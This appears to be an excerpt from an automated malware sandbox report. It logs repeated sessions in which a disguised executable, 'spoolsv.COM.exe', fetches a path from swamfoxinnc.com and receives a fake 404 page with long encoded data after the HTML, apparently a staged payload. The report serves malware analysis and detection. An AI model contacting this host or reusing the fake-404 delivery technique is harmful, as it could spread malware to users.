                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:19 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:19 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.1049813176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:21 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:23 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:22 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:23 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:23 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:23 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:23 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.1049825176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:25 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:26 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:26 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:26 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:26 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:26 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:26 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.1049833176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:28 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:30 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:29 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:30 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:30 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:30 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:30 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.1049844176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:32 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:33 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:33 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:33 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:33 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
